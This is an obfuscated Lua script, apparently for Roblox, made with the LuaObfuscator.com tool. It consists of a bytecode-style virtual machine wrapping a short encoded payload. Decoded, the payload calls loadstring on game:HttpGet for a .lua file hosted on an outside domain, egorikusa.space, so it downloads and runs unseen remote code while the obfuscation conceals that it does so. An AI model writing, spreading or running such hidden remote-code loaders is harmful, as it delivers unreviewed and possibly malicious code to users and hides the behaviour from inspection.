--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v89=0;while true do if (v89==0) then v19=v0(v3(v30,1,1));return "";end end else local v90=v2(v0(v30,16));if v19 then local v114=v5(v90,v19);v19=nil;return v114;else return v90;end end end);local function v20(v31,v32,v33) if v33 then local v91=0 -0 ;local v92;while true do if (v91==(0 -0)) then v92=(v31/((3 -(1 -0))^(v32-(1 + 0))))%((2 -0)^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + (1 -0))) ;return v92-(v92%(932 -(857 + 74))) ;end end else local v93=0 -0 ;local v94;while true do if (v93==(568 -((717 -(87 + 263)) + 201))) then v94=(929 -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v94 + v94))>=v94) and (1 + 0)) or (0 -(180 -(67 + 113))) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + 2 + 0 );v18=v18 + 2 ;return (v36 * (628 -372)) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + 3 + 0 );v18=v18 + (15 -(19 -8)) ;return (v40 * ((12212644 + 4565524) -(802 + 150))) + (v39 * 65536) + (v38 * (689 -433)) + v37 ;end local function v24() local v41=430 -(44 + 386) ;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v41==(1487 -(998 + 488))) then v44=998 -(915 + 82) ;v45=(v20(v43,(1819 -(1703 + 114)) -1 ,12 + 8 ) * ((2 -(1055 -(87 + 968)))^((834 -(376 + 325)) -(444 -343)))) + v42 ;v41=1189 -(1069 + 118) ;end if ((7 -(5 + 0))==v41) then v46=v20(v43,74 -53 ,70 -39 );v47=((v20(v43,(175 -97) -46 )==(1 + 0)) and  -(1 -0)) or ((1 -0) + 0) ;v41=(1417 -(447 + 966)) -1 ;end if (v41==(0 -0)) then v42=v23();v43=v23();v41=1081 -(1020 + 60) ;end if (v41==(3 + 0 + 0)) then if (v46==((2165 -1374) -(368 + 423))) then if (v45==(0 -0)) then return v47 * (18 -(10 + 8)) ;else v46=3 -2 ;v44=442 -(416 + 26) ;end elseif (v46==(3960 -(1789 + 124))) then return ((v45==(0 -(0 -0))) and (v47 * ((1 + 0)/(0 + 0)))) or (v47 * NaN) ;end return v8(v47,v46-(4012 -2989) ) * (v44 + (v45/((3 -1)^(490 -(145 + 293))))) ;end end end local function v25(v48) local v49;if  not v48 then v48=v23();if (v48==(14 -(9 + 5))) then return "";end end v49=v3(v16,v18,(v18 + v48) -(377 -((323 -238) + 291)) );v18=v18 + v48 ;local v50={};for v66=1266 -(243 + 1022) , #v49 do v50[v66]=v2(v1(v3(v49,v66,v66)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return function(v95,v96,v97,v98,v99,v100,v101,v102,v103) local v104=(function() return 121 -(17 + 104) ;end)();local v95=(function() return;end)();local v96=(function() return;end)();while true do local v113=(function() return 0 -0 ;end)();while true do if (v113~=0) then else if (1==v104) then local v120=(function() return 0 + 0 ;end)();while true do if (v120==0) then while true do if (v95~=(0 + 0)) then else v96=(function() return v97();end)();if (v98(v96, #"<", #".")==(0 -0)) then local v186=(function() return 0;end)();local v187=(function() return;end)();local v188=(function() return;end)();local v189=(function() return;end)();while true do if (v186~=3) then else if (v98(v188, #"91(", #"nil")== #" ") then v189[ #"0836"]=(function() return v101[v189[ #"0313"]];end)();end v102[v103]=(function() return v189;end)();break;end if (2~=v186) then else if (v98(v188, #"]", #"|")== #",") then v189[2 -0 ]=(function() return v101[v189[2]];end)();end if (v98(v188,2,2)== #"\\") then v189[ #"-19"]=(function() return v101[v189[ #"19("]];end)();end v186=(function() return 1 + 2 ;end)();end if ((1637 -(1373 + 263))~=v186) then else local v191=(function() return 1000 -(451 + 549) ;end)();while true do if (v191==1) then v186=(function() return 1 + 1 ;end)();break;end if ((0 -0)==v191) then v189=(function() return {v99(),v99(),nil,nil};end)();if (v187==0) then local v196=(function() return 0;end)();local v197=(function() return;end)();while true do if (v196==0) then v197=(function() return 0 -0 ;end)();while true do if (v197~=0) then else v189[ #"gha"]=(function() return v99();end)();v189[ #"http"]=(function() return v99();end)();break;end end break;end end elseif (v187== #"\\") then v189[ #"nil"]=(function() return v100();end)();elseif (v187==2) then v189[ #"-19"]=(function() return v100() -(2^16) ;end)();elseif (v187== #"-19") then local v202=(function() return 1384 -(746 + 638) ;end)();local v203=(function() return;end)();while true do if (v202~=0) then else v203=(function() return 0 + 0 ;end)();while true do if (v203~=0) then else v189[ #"91("]=(function() return v100() -((2 -0)^(357 -(218 + 123))) ;end)();v189[ #"asd1"]=(function() return v99();end)();break;end end break;end end end v191=(function() return 1582 -(1535 + 46) ;end)();end end end if (v186==(0 + 0)) then local v192=(function() return 0;end)();while true do if (v192~=(0 + 0)) then else v187=(function() return v98(v96,562 -(306 + 254) , #"gha");end)();v188=(function() return v98(v96, #"xnxx",1 + 5 );end)();v192=(function() return 1;end)();end if (v192~=(1 -0)) then else v186=(function() return 1468 -(899 + 568) ;end)();break;end end end end end break;end end return v95,v96,v97,v98,v99,v100,v101,v102,v103;end end end if (v104==0) then local v121=(function() return 0 + 0 ;end)();local v122=(function() return;end)();while true do if (v121==0) then v122=(function() return 0 -0 ;end)();while true do if (v122~=(604 -(268 + 335))) then else v104=(function() return 291 -(60 + 230) ;end)();break;end if (v122==0) then v95=(function() return 572 -(426 + 146) ;end)();v96=(function() return nil;end)();v122=(function() return 1;end)();end end break;end end end break;end end end end;end)();local v52=(function() return function(v105,v106,v107) local v108=(function() return 0 + 0 ;end)();local v109=(function() return;end)();while true do if (v108==(1456 -(282 + 1174))) then v109=(function() return 0;end)();while true do if (v109~=(811 -(569 + 242))) then else local v123=(function() return 0;end)();while true do if ((0 -0)==v123) then local v145=(function() return 0;end)();while true do if (v145==(0 + 0)) then v105[v106-#":" ]=(function() return v107();end)();return v105,v106,v107;end end end end end end break;end end end;end)();local v53=(function() return {};end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {v53,v54,nil,v55};end)();local v57=(function() return v23();end)();local v58=(function() return {};end)();for v68= #"/",v57 do local v69=(function() return 1024 -(706 + 318) ;end)();local v70=(function() return;end)();local v71=(function() return;end)();local v72=(function() return;end)();while true do if (v69==0) then v70=(function() return 1251 -(721 + 530) ;end)();v71=(function() return nil;end)();v69=(function() return 1;end)();end if (v69==1) then v72=(function() return nil;end)();while true do if (v70~=(1272 -(945 + 326))) then else if (v71== #":") then v72=(function() return v21()~=0 ;end)();elseif (v71==(4 -2)) then v72=(function() return v24();end)();elseif (v71== #"91(") then v72=(function() return v25();end)();end v58[v68]=(function() return v72;end)();break;end if (v70~=(0 + 0)) then else v71=(function() return v21();end)();v72=(function() return nil;end)();v70=(function() return 1;end)();end end break;end end end v56[ #"-19"]=(function() return v21();end)();for v73= #":",v23() do FlatIdent_1743D,Descriptor,v21,v20,v22,v23,v58,v53,v73=(function() return v51(FlatIdent_1743D,Descriptor,v21,v20,v22,v23,v58,v53,v73);end)();end for v74= #"<",v23() do v54,v74,v28=(function() return v52(v54,v74,v28);end)();end return v56;end local function v29(v60,v61,v62) local v63=v60[701 -(271 + 429) ];local v64=v60[2 + 0 ];local v65=v60[1503 -(1408 + 92) ];return function(...) local v75=v63;local v76=v64;local v77=v65;local v78=v27;local v79=1087 -(461 + (1505 -880)) ;local v80= -1;local v81={};local v82={...};local v83=v12("#",...) -(1 + 0 + 0) ;local v84={};local v85={};for v110=0 -0 ,v83 do if (v110>=v77) then v81[v110-v77 ]=v82[v110 + ((275 + 897) -(418 + (2443 -(1121 + 569)))) ];else v85[v110]=v82[v110 + (2 -1) + 0 ];end end local v86=(v83-v77) + 1 + 0 + 0 ;local v87;local v88;while true do v87=v75[v79];v88=v87[1 + 0 ];if ((v88<=(2 + 2)) or (33>=3224)) then if ((3932==3932) and (v88<=(530 -(406 + (337 -(22 + 192)))))) then if (v88>(1769 -(1749 + 20))) then v85[v87[1 + 1 ]]=v87[(690 + 635) -(1249 + 73) ];else v85[v87[2]]();end elseif ((2882==2882) and (v88<=((1 -0) + 1 + 0))) then v85[v87[(1310 -(92 + 71)) -(466 + 679) ]]=v62[v87[6 -3 ]];elseif (v88>(8 -(3 + 2))) then local v138=v87[(2585 -(483 + 200)) -(106 + 1794) ];local v139,v140=v78(v85[v138](v13(v85,v138 + 1 + 0 ,v87[5 -2 ])));v80=(v140 + v138) -(1 + 0) ;local v141=0 + 0 ;for v146=v138,v80 do local v147=0 + (0 -0) ;while true do if ((0 -0)==v147) then v141=v141 + (337 -(144 + 192)) ;v85[v146]=v139[v141];break;end end end else do return;end end elseif (v88<=((1479 -(1404 + 59)) -10)) then if ((v88>(4 + 1)) or (2029>=3521)) then local v128=114 -((10 -6) + 110) ;local v129;local v130;local v131;local v132;local v133;while true do if ((v128==(590 -(57 + (1292 -(574 + 191))))) or (2037>=4642)) then v87=v75[v79];v133=v87[1429 -(41 + (1862 -476)) ];v130,v131=v78(v85[v133](v13(v85,v133 + (1505 -(363 + 1141)) ,v87[1583 -(1183 + 397) ])));v80=(v131 + v133) -(104 -(17 + 86)) ;v128=5 + 2 ;end if ((1720<4458) and (v128==(6 + 2))) then v133=v87[3 -1 ];v85[v133]=v85[v133](v13(v85,v133 + (2 -1) ,v80));v79=v79 + (167 -(122 + 37 + 7)) ;v87=v75[v79];v128=15 -6 ;end if ((12 -8)==v128) then v85[v133]=v132[v87[4 + 0 ]];v79=v79 + 1 + 0 ;v87=v75[v79];v85[v87[3 -1 ]]=v87[(833 -(468 + 297)) -(30 + 35) ];v128=4 + 1 ;end if ((v128==(857 -(564 + 292))) or (436>3021)) then v85[v87[1259 -(1043 + 214) ]]={};v79=v79 + 1 ;v87=v75[v79];v85[v87[(569 -(334 + 228)) -5 ]]=v62[v87[1215 -(323 + 889) ]];v128=2 + 0 ;end if ((713<=847) and ((481 -(41 + 435))==v128)) then v79=v79 + (2 -1) ;v87=v75[v79];v85[v87[(1962 -1380) -((904 -543) + 219) ]]=v87[323 -((122 -69) + 267) ]~=(0 + 0) ;v79=v79 + 1 + 0 ;v128=(215 + 204) -(15 + 398) ;end if (v128==(989 -(18 + 964))) then v129=0 -0 ;for v178=v133,v80 do v129=v129 + 1 + 0 ;v85[v178]=v130[v129];end v79=v79 + 1 + 0 ;v87=v75[v79];v128=858 -(20 + 830) ;end if ((8 + 1)==v128) then v85[v87[128 -(116 + 10) ]]();v79=v79 + 1 + 0 ;v87=v75[v79];do return;end break;end if (v128==(741 -(542 + 196))) then v87=v75[v79];v133=v87[2 + 0 ];v132=v85[v87[6 -3 ]];v85[v133 + 1 + 0 ]=v132;v128=3 + 1 ;end if (v128==((1849 -829) -(697 + 321))) then v79=v79 + 1 + 0 ;v87=v75[v79];v85[v87[4 -2 ]]=v62[v87[7 -(2 + 2) ]];v79=v79 + (1552 -(1126 + 425)) ;v128=408 -(118 + 287) ;end if (v128==(0 -(236 -(141 + 95)))) then v129=nil;v130,v131=nil;v132=nil;v133=nil;v128=(2 + 0) -1 ;end end else local v134=0 -0 ;local v135;local v136;while true do if (v134==(611 -(602 + 9))) then v135=v87[1123 -(118 + 1003) ];v136=v85[v87[875 -(826 + 46) ]];v134=2 -1 ;end if (v134==((972 -594) -(142 + 235))) then v85[v135 + (3 -2) ]=v136;v85[v135]=v136[v87[18 -14 ]];break;end end end elseif ((2154<=4031) and (v88<=(2 + 5))) then v85[v87[979 -(553 + 424) ]]={};elseif ((4615==4615) and (v88>((863 -(254 + 595)) -6))) then v85[v87[2 + (0 -0) ]]=v87[3 + 0 ]~=(0 + 0) ;else local v143=0 + 0 ;local v144;while true do if (v143==(0 -0)) then v144=v87[5 -3 ];v85[v144]=v85[v144](v13(v85,v144 + (1206 -((1028 -(55 + 71)) + 303)) ,v80));break;end end end v79=v79 + 1 + 0 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403343Q00682Q7470733A2Q2F65676F72696B7573612E73706163652F66373262323439653936303433316564633237342Q3236372E6C7561000A4Q00067Q00122Q000100013Q00122Q000200023Q00202Q00020002000300122Q000400046Q000500016Q000200056Q00013Q00024Q0001000100016Q00017Q00",v9(),...);
